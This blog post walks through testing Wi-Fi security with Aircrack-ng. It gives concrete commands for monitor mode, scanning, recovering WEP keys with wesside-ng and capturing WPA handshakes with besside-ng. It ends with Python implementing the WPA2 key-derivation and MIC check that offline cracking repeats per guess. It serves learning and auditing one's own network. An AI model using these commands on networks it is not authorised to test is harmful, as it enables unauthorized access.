WPA3 certification has begun. I’m not sure there’s a lot to say about the current state of wireless security beyond keeping routers up to date and using nice long passwords.
I’ll briefly revisit the ez-mode version of the testing I’ve done in the past, but it’s pretty straightforward.
Wireless Security: Hardware
I picked up an ALFA USB antenna (2.4 GHz only) a while ago to play with, and under Kali Linux you’ve got your choice of tools to look into. There are a number of graphical options, but generally if you want to learn what you’re doing you should be looking at the gold standard: Aircrack-ng.
Kali should pick the antenna up out of the box, but if you’re running Kali under a virtual machine you likely have some USB passthrough configuration to do (which is beyond the scope of this brief post).
Wireless Security: Aircrack-ng
Aircrack-ng has a wide variety of tools to play with, and here I’ll go through some of the straightforward ones.
Assuming your wifi card is detected as wlan0, putting the card into monitor mode with airmon-ng is your first step:
airmon-ng start wlan0
This gives you a new interface in monitoring mode, wlan0mon, which you’ll use to do the meat of the work here.
Your next step is to scan for your test network using airodump-ng:
airodump-ng wlan0mon
You’ll likely get quite a list over time, assuming you’re in a populated area. There are ways to filter, like --channel and --bssid, if you’d like to get more specific, but usually I just scan everything for some amount of time.
Wireless Security: Acquire handshakes and crack
If you’d like to crack a WEP network, simply run wesside-ng with the target AP MAC:
wesside-ng -v <target AP MAC> -i wlan0mon
And you should get a few files: wep.cap (the total packet capture), prga.log (contains PRGA for use with other tools), and key.log (contains the WEP key). wesside-ng is simple and straightforward, but you’re not likely to see any WEP APs in 2018.
If you’d like to crack a WPA/WPA2/(presumably) WPA3 network, run besside-ng with the target AP MAC:
besside-ng -b <target AP MAC> wlan0mon
This may take QUITE some time, as it’s monitoring to see a full four-way client handshake. No clients, no handshake! This’ll give you besside.log (a record of what happened) and wpa.cap, a full packet capture that the tool grabbed.
Once you’ve got the full wpa.cap, you can use Hashcat to attack the handshake itself. I’ll probably get around to a Hashcat post sooner or later.
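To see what the captured handshake actually gives an offline tool like Hashcat to work with, and why a long passphrase is the defence, here is the WPA2-Personal key derivation from the IEEE 802.11 standard written out in Python. This is an added illustration, not code from the post or from Aircrack-ng; the MAC addresses, nonces and EAPOL frame in the test are constructed sample values, and the PBKDF2 check uses the standard's own test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac

# Constants fixed by IEEE 802.11 for WPA/WPA2-Personal (PSK) key derivation.
PBKDF2_ITERATIONS = 4096
PTK_LABEL = b"Pairwise key expansion"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).

    This is the expensive step: every candidate passphrase tried against a
    captured wpa.cap costs 4096 HMAC-SHA1 rounds, which is why passphrase
    length (and a non-default SSID, which acts as the salt) matters."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, dklen=32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1 blocks over label||0x00||data||i."""
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64 bytes needed
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, label, min(MACs)||max(MACs)||min(nonces)||max(nonces)).

    The two MACs and two nonces are exactly what the four-way handshake in
    wpa.cap must contain; without a client (no SNonce) there is nothing to derive."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, PTK_LABEL, data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the EAPOL-Key frame
    with its 16-byte MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def handshake_mic_valid(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                        anonce: bytes, snonce: bytes, eapol_frame_mic_zeroed: bytes,
                        captured_mic: bytes) -> bool:
    """The check an AP performs on message 2 of the handshake. An offline attack
    simply repeats it per guess, paying derive_pmk() each time."""
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_frame_mic_zeroed), captured_mic)
```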